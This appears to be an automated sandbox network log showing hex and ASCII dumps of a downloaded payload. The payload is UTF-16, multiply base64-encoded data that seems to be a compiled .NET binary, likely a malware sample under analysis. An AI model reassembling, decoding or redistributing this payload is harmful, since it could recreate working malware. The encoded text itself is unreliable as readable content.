                                                                                                                                                                                2021-12-01 09:04:36 UTC36INData Raw: 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46 00 53 00 65 00 6c 00 70 00 42 00 51 00 55 00 46 00 44 00 62 00 54 00 6c 00 73 00 51 00 55 00 46 00 42 00 53 00 32 00 4a 00 35 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 52 00 56 00 46 00 52 00 62 00 30 00 52 00 6e 00 51 00 55 00 46 00 43 00 62 00 6b 00 35 00 74 00 51 00 55 00 46 00 42 00 53 00 32 00 4a 00 35 00 64 00 30 00 4a 00 42 00 51 00 56 00 6c 00 73 00 59 00 33 00 70 00 5a 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 4b 00 5a 00 30 00 56 00 42 00 51 00 6d 00 6c 00 57 00 65 00 6c 00 4a 00 6e 00 51 00 55 00 46 00 44 00 62 00 54 00 68 00 76 00 51 00 56 00 46 00 42 00 52 00 30 00 70 00 59 00 54 00 6b 00 6c 00 42 00 51 00 55 00 46 00 4c 00 59 00 6e 00 6c 00 76 00 51 00 6b 00 46 00 42 00 57
                                                                                                                                                                                Data Ascii: UJBQVlsRVFSelpBQUFDbTlsQUFBS2J5UUJBQVlsRVFRb0RnQUFCbk5tQUFBS2J5d0JBQVlsY3pZQUFBcHZKZ0VBQmlWelJnQUFDbThvQVFBR0pYTklBQUFLYnlvQkFBW
                                                                                                                                                                                2021-12-01 09:04:36 UTC37INData Raw: 00 4e 00 70 00 5a 00 32 00 5a 00 42 00 51 00 55 00 46 00 4c 00 59 00 6a 00 59 00 77 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 50 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 64 00 30 00 46 00 52 00 51 00 55 00 64 00 46 00 64 00 31 00 6c 00 53 00 51 00 6d 00 64 00 6e 00 55 00 6b 00 4a 00 43 00 63 00 55 00 35 00 58 00 5a 00 30 00 46 00 42 00 51 00 56 00 4e 00 59 00 55 00 54 00 5a 00 33 00 51 00 55 00 46 00 43 00 51 00 32 00 63 00 7a 00 51 00 55 00 46 00 42 00 53 00 32 00 4e 00 36 00 5a 00 30 00 46 00 42 00 51 00 58 00 42 00 32 00 63 00 6c 00 46 00 42 00 51 00 55 00 4a 00 74 00 4f 00 44 00 64 00 42 00 51 00 55 00 46 00 4c 00 59 00 6e 00 70 00 4a 00 51 00 6b 00 46 00 42 00 57 00 56 00 4a 00 43 00 5a 00 32 00 64 00 53 00 51 00 6b 00 4a 00 78 00 54 00
                                                                                                                                                                                Data Ascii: NpZ2ZBQUFLYjYwQUFBWnZPd0FBQ25Nd0FRQUdFd1lSQmdnUkJCcU5XZ0FBQVNYUTZ3QUFCQ2czQUFBS2N6Z0FBQXB2clFBQUJtODdBQUFLYnpJQkFBWVJCZ2dSQkJxT
                                                                                                                                                                                2021-12-01 09:04:36 UTC39INData Raw: 64 00 42 00 51 00 55 00 46 00 53 00 63 00 33 00 64 00 43 00 55 00 55 00 4a 00 36 00 51 00 55 00 46 00 42 00 51 00 55 00 52 00 6e 00 51 00 55 00 46 00 46 00 57 00 44 00 52 00 6c 00 51 00 55 00 46 00 42 00 53 00 30 00 4e 00 6e 00 53 00 57 00 5a 00 44 00 62 00 7a 00 46 00 68 00 51 00 55 00 46 00 42 00 51 00 6b 00 70 00 6b 00 51 00 32 00 39 00 42 00 51 00 55 00 46 00 46 00 53 00 30 00 52 00 6a 00 51 00 55 00 46 00 42 00 63 00 48 00 70 00 50 00 51 00 55 00 46 00 42 00 51 00 32 00 6c 00 6f 00 61 00 6b 00 46 00 42 00 51 00 55 00 74 00 6d 00 61 00 44 00 52 00 42 00 51 00 55 00 46 00 77 00 64 00 6b 00 68 00 33 00 51 00 55 00 46 00 44 00 61 00 45 00 46 00 42 00 51 00 57 00 68 00 6c 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 56 00 58 00 53 00 44
                                                                                                                                                                                Data Ascii: dBQUFSc3dCUUJ6QUFBQURnQUFFWDRlQUFBS0NnSWZDbzFhQUFBQkpkQ29BQUFFS0RjQUFBcHpPQUFBQ2loakFBQUtmaDRBQUFwdkh3QUFDaEFBQWhlTldnQUFBU1VXSD
                                                                                                                                                                                2021-12-01 09:04:36 UTC40INData Raw: 00 76 00 51 00 55 00 46 00 42 00 53 00 30 00 78 00 52 00 59 00 30 00 64 00 45 00 54 00 6a 00 4a 00 6a 00 51 00 56 00 46 00 42 00 51 00 55 00 4a 00 34 00 4f 00 46 00 6c 00 71 00 56 00 6d 00 39 00 42 00 51 00 55 00 46 00 46 00 62 00 44 00 42 00 50 00 62 00 30 00 46 00 42 00 51 00 56 00 46 00 76 00 54 00 6e 00 64 00 42 00 51 00 55 00 4e 00 75 00 54 00 54 00 52 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 5a 00 7a 00 52 00 45 00 46 00 49 00 51 00 69 00 74 00 49 00 5a 00 30 00 46 00 42 00 51 00 32 00 6c 00 6e 00 5a 00 6b 00 46 00 42 00 51 00 55 00 74 00 69 00 4d 00 6d 00 74 00 42 00 51 00 55 00 46 00 76 00 54 00 6b 00 5a 00 6f 00 54 00 55 00 56 00 50 00 52 00 6c 00 6c 00 43 00 51 00 55 00 46 00 42 00 53 00 6b 00 56 00 52 00 55 00 32 00 46 00 69 00 4d 00 6d 00
                                                                                                                                                                                Data Ascii: vQUFBS0xRY0dETjJjQVFBQUJ4OFlqVm9BQUFFbDBPb0FBQVFvTndBQUNuTTRBQUFLY3ZzREFIQitIZ0FBQ2lnZkFBQUtiMmtBQUFvTkZoTUVPRllCQUFBSkVRU2FiMm
                                                                                                                                                                                2021-12-01 09:04:36 UTC41INData Raw: 46 00 55 00 56 00 6c 00 59 00 56 00 30 00 4a 00 4e 00 52 00 30 00 56 00 52 00 57 00 56 00 4a 00 43 00 57 00 54 00 56 00 77 00 55 00 44 00 68 00 51 00 4b 00 79 00 38 00 76 00 4f 00 46 00 4a 00 43 00 51 00 6d 00 52 00 5a 00 52 00 58 00 64 00 52 00 55 00 6b 00 4a 00 42 00 62 00 55 00 39 00 68 00 56 00 43 00 74 00 6e 00 4c 00 33 00 59 00 76 00 4c 00 7a 00 4e 00 6e 00 54 00 57 00 30 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00 64 00 6e 00 63 00 55 00 46 00 42 00 51 00 55 00 46 00 52 00 56 00 46 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 33 00 56 00 42 00 51 00 55 00 46 00 42 00 53 00 57 00 64 00 46 00 51 00 55 00 46 00 4f 00 51 00 55 00 4a 00 42 00 51 00 55 00 46 00 45 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 6e 00 51 00 55 00 46
                                                                                                                                                                                Data Ascii: FUVlYV0JNR0VRWVJCWTVwUDhQKy8vOFJCQmRZRXdRUkJBbU9hVCtnL3YvLzNnTW0zZ0FHS2dncUFBQUFRVFFBQUFBQUFBQ3VBQUFBSWdFQUFOQUJBQUFEQUFBQUNnQUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC43INData Raw: 00 57 00 55 00 46 00 6a 00 53 00 45 00 70 00 61 00 51 00 6d 00 64 00 43 00 64 00 32 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 76 00 53 00 48 00 64 00 42 00 51 00 55 00 4e 00 70 00 61 00 6d 00 4a 00 42 00 51 00 55 00 46 00 48 00 53 00 30 00 46 00 33 00 51 00 55 00 46 00 44 00 63 00 30 00 52 00 69 00 4c 00 33 00 4e 00 43 00 51 00 55 00 46 00 5a 00 63 00 58 00 70 00 6e 00 53 00 57 00 39 00 47 00 55 00 55 00 46 00 42 00 51 00 6d 00 35 00 4b 00 64 00 45 00 4a 00 6e 00 51 00 6e 00 64 00 6a 00 63 00 32 00 4e 00 48 00 51 00 55 00 68 00 43 00 4b 00 30 00 68 00 6e 00 51 00 55 00 46 00 44 00 61 00 57 00 64 00 6d 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00 4f 00 63 00 30 00 46 00 42 00 51 00 56 00 6c 00 76 00 52 00 46 00 46 00 42 00 51 00 55 00 74 00
                                                                                                                                                                                Data Ascii: WUFjSEpaQmdCd2ZoNEFBQW9vSHdBQUNpamJBQUFHS0F3QUFDc0RiL3NCQUFZcXpnSW9GUUFBQm5KdEJnQndjc2NHQUhCK0hnQUFDaWdmQUFBS0tOc0FBQVlvRFFBQUt
                                                                                                                                                                                2021-12-01 09:04:36 UTC44INData Raw: 57 00 6b 00 4e 00 43 00 57 00 57 00 5a 00 46 00 51 00 32 00 68 00 32 00 51 00 55 00 46 00 42 00 53 00 30 00 4a 00 34 00 57 00 55 00 70 00 47 00 5a 00 32 00 56 00 50 00 59 00 56 00 46 00 70 00 54 00 32 00 46 00 57 00 61 00 32 00 39 00 69 00 64 00 30 00 46 00 42 00 51 00 32 00 35 00 4e 00 56 00 45 00 46 00 42 00 51 00 55 00 64 00 42 00 64 00 31 00 6c 00 56 00 51 00 31 00 46 00 6f 00 64 00 6b 00 6c 00 42 00 51 00 55 00 46 00 43 00 61 00 45 00 31 00 46 00 4d 00 32 00 64 00 56 00 62 00 54 00 4e 00 6e 00 51 00 56 00 56 00 4c 00 61 00 45 00 56 00 46 00 53 00 32 00 64 00 42 00 51 00 55 00 46 00 53 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 47 00 64 00 43 00 61 00 32 00 64 00 6e 00 51 00 55 00 52 00 45 00 64 00 30 00 46 00 42 00 51 00 56 00 4a 00 7a
                                                                                                                                                                                Data Ascii: WkNCWWZFQ2h2QUFBS0J4WUpGZ2VPYVFpT2FWa29id0FBQ25NVEFBQUdBd1lVQ1FodklBQUFCaE1FM2dVbTNnQVVLaEVFS2dBQUFSQUFBQUFBSGdCa2dnQUREd0FBQVJz
                                                                                                                                                                                2021-12-01 09:04:36 UTC45INData Raw: 00 6b 00 4a 00 5a 00 62 00 30 00 5a 00 6e 00 51 00 55 00 46 00 43 00 61 00 58 00 64 00 48 00 59 00 7a 00 4e 00 46 00 51 00 55 00 46 00 42 00 63 00 44 00 5a 00 4c 00 53 00 46 00 56 00 42 00 51 00 55 00 46 00 76 00 52 00 6d 00 49 00 7a 00 51 00 55 00 46 00 42 00 51 00 57 00 39 00 4d 00 51 00 57 00 64 00 61 00 65 00 57 00 35 00 33 00 5a 00 30 00 46 00 6a 00 51 00 57 00 4e 00 49 00 61 00 6d 00 31 00 72 00 56 00 30 00 74 00 43 00 63 00 30 00 46 00 42 00 51 00 56 00 6c 00 7a 00 51 00 6d 00 35 00 4f 00 65 00 45 00 46 00 42 00 51 00 55 00 74 00 6c 00 5a 00 31 00 6c 00 78 00 52 00 58 00 70 00 42 00 53 00 30 00 46 00 48 00 4f 00 45 00 46 00 42 00 51 00 55 00 46 00 57 00 51 00 55 00 46 00 42 00 55 00 6b 00 46 00 6e 00 54 00 6e 00 6c 00 31 00 55 00 57 00 64 00 42 00
                                                                                                                                                                                Data Ascii: kJZb0ZnQUFCaXdHYzNFQUFBcDZLSFVBQUFvRmIzQUFBQW9MQWdaeW53Z0FjQWNIam1rV0tCc0FBQVlzQm5OeEFBQUtlZ1lxRXpBS0FHOEFBQUFWQUFBUkFnTnl1UWdB
                                                                                                                                                                                2021-12-01 09:04:36 UTC47INData Raw: 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 69 00 5a 00 30 00 46 00 42 00 51 00 32 00 64 00 4b 00 64 00 6d 00 4e 00 42 00 51 00 55 00 46 00 44 00 5a 00 30 00 31 00 46 00 53 00 30 00 4e 00 6a 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 5a 00 55 00 55 00 46 00 42 00 51 00 32 00 6c 00 76 00 51 00 55 00 46 00 43 00 63 00 33 00 64 00 42 00 64 00 30 00 46 00 6b 00 51 00 55 00 46 00 42 00 51 00 55 00 56 00 33 00 51 00 55 00 46 00 46 00 55 00 55 00 6c 00 7a 00 51 00 6b 00 46 00 4c 00 54 00 30 00 78 00 52 00 55 00 56 00 56 00 44 00 64 00 44 00 52 00 52 00 51 00 57 00 64 00 52 00 52 00 45 00 74 00 49 00 61 00 30 00 46 00 42 00 51 00 57 00 39 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55 00 5a 00 42 00 63 00 6d 00 56 00 42 00 51
                                                                                                                                                                                Data Ascii: UFLY3pnQUFBb29iZ0FBQ2dKdmNBQUFDZ01FS0NjQUFBWnZZUUFBQ2lvQUFCc3dBd0FkQUFBQUV3QUFFUUlzQkFLT0xRUVVDdDRRQWdRREtIa0FBQW9LM2dVbUZBcmVBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC48INData Raw: 00 52 00 69 00 4e 00 45 00 31 00 42 00 51 00 55 00 46 00 77 00 5a 00 47 00 4a 00 35 00 59 00 30 00 46 00 42 00 51 00 58 00 42 00 6f 00 61 00 6b 00 68 00 4e 00 51 00 55 00 46 00 42 00 52 00 57 00 46 00 4c 00 53 00 56 00 46 00 42 00 51 00 55 00 46 00 77 00 64 00 6d 00 68 00 52 00 51 00 55 00 46 00 44 00 61 00 56 00 6c 00 49 00 52 00 6a 00 46 00 6e 00 54 00 45 00 4a 00 33 00 53 00 6e 00 5a 00 6e 00 64 00 30 00 46 00 42 00 51 00 32 00 70 00 4d 00 54 00 45 00 4a 00 74 00 4b 00 30 00 64 00 42 00 51 00 55 00 46 00 4c 00 53 00 32 00 31 00 4a 00 51 00 32 00 49 00 30 00 59 00 30 00 46 00 42 00 51 00 57 00 39 00 58 00 51 00 57 00 30 00 72 00 52 00 45 00 46 00 42 00 51 00 55 00 74 00 4c 00 53 00 57 00 64 00 42 00 51 00 55 00 46 00 76 00 62 00 30 00 78 00 42 00 51 00
                                                                                                                                                                                Data Ascii: RiNE1BQUFwZGJ5Y0FBQXBoakhNQUFBRWFLSVFBQUFwdmhRQUFDaVlIRjFnTEJ3SnZnd0FBQ2pMTEJtK0dBQUFLS21JQ2I0Y0FBQW9XQW0rREFBQUtLSWdBQUFvb0xBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC49INData Raw: 46 00 42 00 51 00 56 00 4a 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 33 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55 00 5a 00 6e 00 63 00 6d 00 56 00 42 00 51 00 56 00 6c 00 78 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 53 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 54 00 30 00 52 00 6e 00 51 00 55 00 5a 00 45 00 64 00 30 00 46 00 42 00 51 00 56 00 4a 00 7a 00 64 00 30 00 46 00 6e 00 51 00 56 00 68 00 42 00 51 00 55 00 46 00 42 00 52 00 33 00 64 00 42 00 51 00 55 00 56 00 52 00 53 00 6a 00 64 00 42 00 5a 00 30 00 46 00 42 00 51 00 6b 00 46 00 4f 00 64 00 6b 00 4a 00 6e 00 52 00 55 00 46 00 43 00 61 00 47 00 4e 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55
                                                                                                                                                                                Data Ascii: FBQVJBbnNDQUFBRWJ3UUJBQVlLM2dVbUZncmVBQVlxQUFBQUFSQUFBQUFBQUFBT0RnQUZEd0FBQVJzd0FnQVhBQUFBR3dBQUVRSjdBZ0FBQkFOdkJnRUFCaGNLM2dVbU
                                                                                                                                                                                2021-12-01 09:04:36 UTC51INData Raw: 00 4a 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 69 00 64 00 32 00 74 00 43 00 51 00 55 00 46 00 5a 00 53 00 7a 00 4e 00 6e 00 56 00 57 00 31 00 47 00 5a 00 33 00 4a 00 6c 00 51 00 55 00 46 00 5a 00 63 00 55 00 46 00 42 00 51 00 55 00 4a 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 4f 00 46 00 42 00 42 00 51 00 56 00 56 00 51 00 51 00 55 00 46 00 42 00 51 00 6b 00 64 00 36 00 51 00 55 00 4e 00 42 00 51 00 6c 00 6c 00 42 00 51 00 55 00 46 00 42 00 59 00 30 00 46 00 42 00 51 00 56 00 4a 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 55 00 45 00 79 00 4f 00 46 00 6c 00 42 00 55 00 55 00 46 00 48 00 51 00 33 00 51 00 30 00 52 00 6b 00 70 00 6f 00 57 00 55 00 73 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00
                                                                                                                                                                                Data Ascii: JQUFBUURid2tCQUFZSzNnVW1GZ3JlQUFZcUFBQUJFQUFBQUFBQUFBOFBBQVVQQUFBQkd6QUNBQllBQUFBY0FBQVJBbnNDQUFBRUEyOFlBUUFHQ3Q0RkpoWUszZ0FHS2
                                                                                                                                                                                2021-12-01 09:04:36 UTC52INData Raw: 42 00 51 00 56 00 4a 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 51 00 52 00 48 00 64 00 42 00 52 00 6b 00 52 00 33 00 51 00 55 00 46 00 42 00 55 00 6e 00 4e 00 33 00 51 00 57 00 64 00 42 00 56 00 30 00 46 00 42 00 51 00 55 00 46 00 49 00 51 00 55 00 46 00 42 00 52 00 56 00 46 00 4b 00 4e 00 30 00 46 00 6e 00 51 00 55 00 46 00 43 00 51 00 55 00 35 00 32 00 52 00 6c 00 46 00 46 00 51 00 55 00 4a 00 6e 00 63 00 6d 00 56 00 43 00 55 00 31 00 6c 00 58 00 51 00 33 00 51 00 30 00 51 00 55 00 4a 00 70 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 45 00 64 00 7a 00 68 00 42 00 51 00 6c 00 45 00 34 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 4e 00 51 00 55 00 6c
                                                                                                                                                                                Data Ascii: BQVJBQUFBQUFBQUFQRHdBRkR3QUFBUnN3QWdBV0FBQUFIQUFBRVFKN0FnQUFCQU52RlFFQUJncmVCU1lXQ3Q0QUJpb0FBQUVRQUFBQUFBQUFEdzhBQlE4QUFBRWJNQUl
                                                                                                                                                                                2021-12-01 09:04:36 UTC53INData Raw: 00 51 00 55 00 46 00 42 00 51 00 55 00 4a 00 7a 00 51 00 55 00 46 00 43 00 52 00 55 00 56 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 55 00 45 00 79 00 4f 00 47 00 46 00 42 00 55 00 55 00 46 00 48 00 56 00 56 00 4a 00 6a 00 53 00 7a 00 4e 00 6e 00 64 00 32 00 31 00 43 00 53 00 45 00 39 00 59 00 51 00 55 00 46 00 42 00 53 00 31 00 56 00 53 00 57 00 55 00 73 00 7a 00 5a 00 30 00 46 00 48 00 53 00 32 00 64 00 46 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 57 00 68 00 4a 00 51 00 55 00 52 00 42 00 4f 00 45 00 46 00 42 00 51 00 55 00 56 00 69 00 54 00 55 00 46 00 4e 00 51 00 55 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 6e 00 4e 00 42 00 51 00 55 00 4a 00 46 00 51 00 32 00 56 00 33 00 53 00 55 00 46 00
                                                                                                                                                                                Data Ascii: QUFBQUJzQUFCRUVBbnNDQUFBRUEyOGFBUUFHVVJjSzNnd21CSE9YQUFBS1VSWUszZ0FHS2dFUUFBQUFBQUFBRWhJQURBOEFBQUViTUFNQUdBQUFBQnNBQUJFQ2V3SUF
                                                                                                                                                                                2021-12-01 09:04:36 UTC57INData Raw: 39 00 74 00 51 00 55 00 46 00 42 00 53 00 32 00 5a 00 52 00 51 00 55 00 4a 00 42 00 51 00 56 00 46 00 76 00 61 00 47 00 64 00 42 00 51 00 55 00 4a 00 6e 00 59 00 69 00 74 00 43 00 5a 00 31 00 6c 00 44 00 51 00 55 00 46 00 61 00 65 00 6e 00 42 00 33 00 51 00 55 00 46 00 44 00 61 00 57 00 64 00 52 00 51 00 55 00 46 00 42 00 63 00 6b 00 74 00 43 00 52 00 55 00 46 00 42 00 51 00 33 00 4e 00 76 00 61 00 48 00 64 00 42 00 51 00 55 00 4a 00 70 00 61 00 55 00 6c 00 42 00 51 00 55 00 46 00 48 00 51 00 6e 00 59 00 30 00 52 00 30 00 4a 00 33 00 53 00 55 00 46 00 43 00 62 00 6b 00 39 00 75 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00 43 00 51 00 55 00 46 00 42 00 51 00 33 00 4e 00 76 00 52 00 56 00 46 00 42 00 51 00 55 00 74 00 35 00 61 00 55 00 70 00 42 00 51 00 55
                                                                                                                                                                                Data Ascii: 9tQUFBS2ZRQUJBQVFvaGdBQUJnYitCZ1lDQUFaenB3QUFDaWdRQUFBcktCRUFBQ3NvaHdBQUJpaUlBQUFHQnY0R0J3SUFCbk9uQUFBS0tCQUFBQ3NvRVFBQUt5aUpBQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC61INData Raw: 00 33 00 64 00 42 00 51 00 55 00 4e 00 30 00 64 00 30 00 64 00 6a 00 4e 00 56 00 6c 00 43 00 51 00 55 00 46 00 5a 00 56 00 45 00 4a 00 43 00 52 00 55 00 56 00 49 00 64 00 33 00 6c 00 4f 00 56 00 32 00 64 00 42 00 51 00 55 00 46 00 54 00 57 00 46 00 46 00 75 00 5a 00 30 00 46 00 42 00 51 00 6b 00 4e 00 6e 00 4d 00 30 00 46 00 42 00 51 00 55 00 74 00 6a 00 65 00 6d 00 64 00 42 00 51 00 55 00 46 00 77 00 64 00 6d 00 74 00 52 00 52 00 55 00 46 00 43 00 61 00 45 00 56 00 46 00 52 00 6a 00 49 00 72 00 56 00 6b 00 46 00 52 00 51 00 55 00 64 00 46 00 55 00 56 00 46 00 76 00 4e 00 58 00 64 00 42 00 51 00 55 00 4a 00 74 00 4b 00 31 00 52 00 42 00 55 00 55 00 46 00 48 00 52 00 56 00 46 00 53 00 64 00 6e 00 6c 00 42 00 51 00 55 00 46 00 44 00 5a 00 30 00 6c 00 48 00
                                                                                                                                                                                Data Ascii: 3dBQUN0d0djNVlCQUFZVEJCRUVId3lOV2dBQUFTWFFuZ0FBQkNnM0FBQUtjemdBQUFwdmtRRUFCaEVFRjIrVkFRQUdFUVFvNXdBQUJtK1RBUUFHRVFSdnlBQUFDZ0lH
                                                                                                                                                                                2021-12-01 09:04:36 UTC65INData Raw: 51 00 6e 00 46 00 4a 00 62 00 45 00 68 00 6f 00 56 00 43 00 74 00 43 00 62 00 6e 00 64 00 42 00 51 00 55 00 46 00 61 00 65 00 6d 00 64 00 6e 00 51 00 55 00 46 00 43 00 63 00 55 00 6c 00 73 00 53 00 48 00 64 00 72 00 56 00 53 00 39 00 6e 00 57 00 6a 00 6c 00 42 00 51 00 55 00 46 00 48 00 59 00 7a 00 52 00 4a 00 51 00 55 00 46 00 42 00 59 00 57 00 6c 00 4b 00 55 00 6a 00 68 00 4c 00 52 00 6c 00 41 00 30 00 52 00 32 00 5a 00 6e 00 51 00 55 00 46 00 43 00 62 00 6b 00 39 00 44 00 51 00 55 00 46 00 42 00 52 00 32 00 39 00 70 00 56 00 57 00 5a 00 44 00 65 00 46 00 51 00 72 00 51 00 6d 00 34 00 34 00 51 00 55 00 46 00 42 00 57 00 6e 00 70 00 6e 00 5a 00 30 00 46 00 42 00 51 00 6e 00 46 00 4a 00 62 00 45 00 68 00 33 00 64 00 31 00 55 00 76 00 5a 00 32 00 46 00 42
                                                                                                                                                                                Data Ascii: QnFJbEhoVCtCbndBQUFaemdnQUFCcUlsSHdrVS9nWjlBQUFHYzRJQUFBYWlKUjhLRlA0R2ZnQUFCbk9DQUFBR29pVWZDeFQrQm44QUFBWnpnZ0FBQnFJbEh3d1UvZ2FB
                                                                                                                                                                                2021-12-01 09:04:36 UTC69INData Raw: 00 53 00 4e 00 33 00 64 00 52 00 51 00 55 00 46 00 44 00 62 00 6a 00 52 00 46 00 51 00 56 00 46 00 42 00 52 00 55 00 74 00 4f 00 55 00 55 00 46 00 42 00 51 00 56 00 70 00 32 00 64 00 32 00 64 00 42 00 51 00 55 00 4e 00 74 00 4c 00 30 00 52 00 42 00 51 00 55 00 46 00 4c 00 53 00 30 00 77 00 30 00 51 00 6b 00 46 00 42 00 57 00 58 00 46 00 53 00 5a 00 31 00 46 00 76 00 65 00 45 00 46 00 42 00 51 00 55 00 4e 00 74 00 4c 00 30 00 5a 00 42 00 51 00 55 00 46 00 4c 00 53 00 30 00 31 00 5a 00 51 00 6b 00 46 00 42 00 57 00 58 00 46 00 4e 00 5a 00 31 00 46 00 76 00 64 00 45 00 46 00 42 00 51 00 55 00 4e 00 70 00 61 00 54 00 52 00 42 00 55 00 55 00 46 00 48 00 53 00 32 00 64 00 42 00 51 00 55 00 46 00 43 00 63 00 33 00 64 00 43 00 55 00 55 00 4d 00 72 00 51 00 55 00
                                                                                                                                                                                Data Ascii: SN3dRQUFDbjRFQVFBRUtOUUFBQVp2d2dBQUNtL0RBQUFLS0w0QkFBWXFSZ1FveEFBQUNtL0ZBQUFLS01ZQkFBWXFNZ1FvdEFBQUNpaTRBUUFHS2dBQUFCc3dCUUMrQU
                                                                                                                                                                                2021-12-01 09:04:36 UTC73INData Raw: 6c 00 42 00 32 00 4c 00 79 00 38 00 76 00 4f 00 54 00 52 00 4c 00 51 00 31 00 4e 00 33 00 52 00 30 00 4e 00 58 00 4f 00 45 00 78 00 42 00 51 00 55 00 46 00 4c 00 4d 00 30 00 46 00 6b 00 64 00 6b 00 52 00 42 00 51 00 55 00 46 00 44 00 61 00 6d 00 39 00 51 00 4c 00 79 00 38 00 76 00 4c 00 7a 00 4e 00 6e 00 62 00 30 00 68 00 4d 00 51 00 56 00 6c 00 49 00 59 00 6e 00 64 00 7a 00 51 00 55 00 46 00 42 00 63 00 6d 00 4d 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 52 00 30 00 74 00 6e 00 51 00 55 00 46 00 52 00 57 00 48 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 6a 00 5a 00 42 00 51 00 55 00 46 00 42 00 56 00 56 00 46 00 42 00 51 00 55 00 46 00 4e 00 63 00 30 00 46 00 42 00 51 00 55 00 46 00 45 00 51 00 55 00 46 00 42 00 51
                                                                                                                                                                                Data Ascii: lB2Ly8vOTRLQ1N3R0NXOExBQUFLM0FkdkRBQUFDam9QLy8vLzNnb0hMQVlIYndzQUFBcmMzZ01tM2dBR0tnQUFRWHdBQUFBQUFBQjZBQUFBVVFBQUFNc0FBQUFEQUFBQ
                                                                                                                                                                                2021-12-01 09:04:36 UTC78INData Raw: 00 4d 00 58 00 70 00 50 00 51 00 55 00 46 00 42 00 51 00 33 00 46 00 4a 00 57 00 47 00 49 00 77 00 64 00 30 00 46 00 42 00 51 00 57 00 39 00 55 00 51 00 6d 00 68 00 46 00 52 00 55 00 64 00 4b 00 62 00 31 00 52 00 43 00 65 00 55 00 4a 00 42 00 55 00 57 00 6b 00 34 00 51 00 57 00 46 00 6f 00 54 00 55 00 6c 00 46 00 55 00 56 00 4e 00 50 00 59 00 56 00 4a 00 72 00 65 00 45 00 4e 00 34 00 52 00 55 00 56 00 48 00 57 00 6d 00 39 00 76 00 55 00 56 00 46 00 42 00 51 00 55 00 4e 00 6f 00 54 00 55 00 6c 00 46 00 55 00 56 00 56 00 6c 00 61 00 6c 00 5a 00 76 00 51 00 55 00 46 00 42 00 52 00 57 00 77 00 77 00 54 00 57 00 74 00 42 00 51 00 55 00 46 00 52 00 62 00 30 00 35 00 33 00 51 00 55 00 46 00 44 00 62 00 6b 00 30 00 30 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00
                                                                                                                                                                                Data Ascii: MXpPQUFBQ3FJWGIwd0FBQW9UQmhFRUdKb1RCeUJBUWk4QWFoTUlFUVNPYVJreEN4RUVHWm9vUVFBQUNoTUlFUVVlalZvQUFBRWwwTWtBQUFRb053QUFDbk00QUFBS0t
                                                                                                                                                                                2021-12-01 09:04:36 UTC82INData Raw: 4a 00 42 00 64 00 32 00 39 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 44 00 56 00 55 00 4a 00 46 00 56 00 46 00 6c 00 43 00 51 00 58 00 64 00 76 00 51 00 55 00 46 00 42 00 52 00 56 00 52 00 4e 00 51 00 55 00 31 00 42 00 55 00 57 00 64 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 46 00 59 00 6e 00 6c 00 4e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 4b 00 51 00 55 00 46 00 42 00 51 00 32 00 67 00 34 00 59 00 55 00 74 00 47 00 53 00 55 00 46 00 42 00 51 00 58 00 42 00 35 00 65 00 48 00 64 00 4a 00 51 00 57 00 4e 00 44 00 5a 00 33 00 4a 00 42 00 51 00 55 00 46 00 4c 00 5a 00 6d 00 67 00 30 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 49 00 64 00 30 00 46 00 42 00 51 00 32 00 67 00 34 00 59 00 30 00 74 00 47 00 53 00 55
